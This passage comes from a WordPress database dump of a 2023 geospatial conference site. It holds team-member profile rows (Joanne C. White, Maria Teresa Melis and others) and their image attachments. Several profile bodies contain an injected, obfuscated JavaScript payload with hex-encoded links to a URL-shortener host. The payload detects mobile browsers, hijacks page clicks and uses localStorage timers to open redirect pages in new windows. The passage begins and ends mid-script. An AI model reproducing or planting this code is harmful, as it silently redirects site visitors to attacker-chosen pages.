_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Francesco Pirotti','','publish','closed','closed','','francesco-pirottiuniversity-of-padova-italy','','','2022-11-19 17:35:16','2022-11-19 17:35:16','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3029',0,'dt_team','',0),
(3030,1,'2022-11-08 19:20:05','2022-11-08 19:20:05','','ws203','','inherit','open','closed','','ws203','','','2022-11-08 19:20:05','2022-11-08 19:20:05','',3029,'https://gsw2023.com/wp-content/uploads/2022/11/ws203.jpg',0,'attachment','image/jpeg',0),
(3031,1,'2022-11-08 19:21:24','2022-11-08 19:21:24','<!-- wp:paragraph -->\n<p>&nbsp;Canadian Forest Service, Canada (WGI-7)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Joanne C. White','','publish','closed','closed','','joanne-c-white','','','2022-11-08 19:21:26','2022-11-08 19:21:26','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3031',0,'dt_team','',0),
(3032,1,'2022-11-08 19:21:05','2022-11-08 19:21:05','','wss201','','inherit','open','closed','','wss201','','','2022-11-08 19:21:05','2022-11-08 19:21:05','',3031,'https://gsw2023.com/wp-content/uploads/2022/11/wss201.jpg',0,'attachment','image/jpeg',0),
(3033,1,'2022-11-08 19:22:23','2022-11-08 19:22:23','<!-- wp:paragraph -->\n<p>University of Cagliari, Italy (WGIII-1)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Maria Teresa Melis','','publish','closed','closed','','maria-teresa-melis','','','2022-11-08 19:22:25','2022-11-08 19:22:25','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3033',0,'dt_team','',0),
(3034,1,'2022-11-08 19:22:01','2022-11-08 19:22:01','','wss202','','inherit','open','closed','','wss202','','','2022-11-08 19:22:01','2022-11-08 19:22:01','',3033,'https://gsw2023.com/wp-content/uploads/2022/11/wss202.jpg',0,'attachment','image/jpeg',0),
(3035,1,'2022-11-08 19:23:19','2022-11-08 19:23:19','<!-- wp:paragraph -->\n<p>Tokyo University of Agriculture and Technology, Japan (WGIII-8)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 